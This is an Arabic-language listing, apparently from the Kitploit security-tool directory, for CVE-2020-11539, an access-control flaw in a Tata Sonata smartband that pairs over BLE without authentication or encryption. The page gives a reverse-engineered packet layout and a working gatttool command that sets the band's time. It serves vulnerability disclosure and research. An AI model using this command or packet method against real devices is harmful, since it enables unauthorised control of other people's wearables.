Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-11539 — التحكم غير السليم في الوصول في Tata Sonata Smartband | Kitploit
أدوات/GitHubGitHub/the-girl-who-lived/cve-2020-11539
أمن البلوتوثأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالأمن الشبكات اللاسلكيةأمان الأجهزة وإنترنت الأشياء
GitHubthe-girl-who-lived/cve-2020-11539

CVE-2020-11539

التحكم غير السليم في الوصول في Tata Sonata Smartband

عرض المستودع
1116منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-11539: التحكم غير السليم في الوصول في Tata Sonata Smartband

معلومات

الوصف: لقد تم تحديد أن السوار الذكي لا يحتوي على إقران (مستوى أمان BLE بالوضع 0) والبيانات المنقولة عبر الهواء غير مشفرة. إضافة إلى ذلك، البيانات المرسلة إلى السوار الذكي لا تخضع لأي مصادقة أو تحقق من التوقيع، مما يتيح لأي مهاجم التحكم في معاملات الجهاز الذكي.

الإصدارات المتأثرة: Smart SF Rush - 1.12

الباحث: Sayli Ambure (https://twitter.com/sayli_ambure)

رابط MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539

استغلال إثبات المفهوم

الوصف

الحزمة التالية تم تحليلها بالهندسة العكسية وتبيّن أنها لتغيير الوقت، ويمكن تحليل المزيد من الحزم عبر استخراج تفريغ hcisnoop من هاتفك.

  1. قيمة البيانات: 00870e00141401060712052b051e

    البيانات (Hexdump):00870e00141401060712052b051e
    البيانات العشرية:00135140020200106071805430530
  • 00 87: رأس الحزمة

  • 0e 00: نوع الحزمة

  • 14 14: السنة بالنظام الست عشري (2020)

  • 01 06: الشهر واليوم (6 يناير)

  • 07 12: الساعة والدقيقة بالنظام الست عشري (07:18 صباحًا)

  • 05 : الثواني

  1. أرسل أمر Gatttool التالي للتحكم في وقت السوار الذكي:

gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e

فيديو إثبات المفهوم:

تنزيل الأداة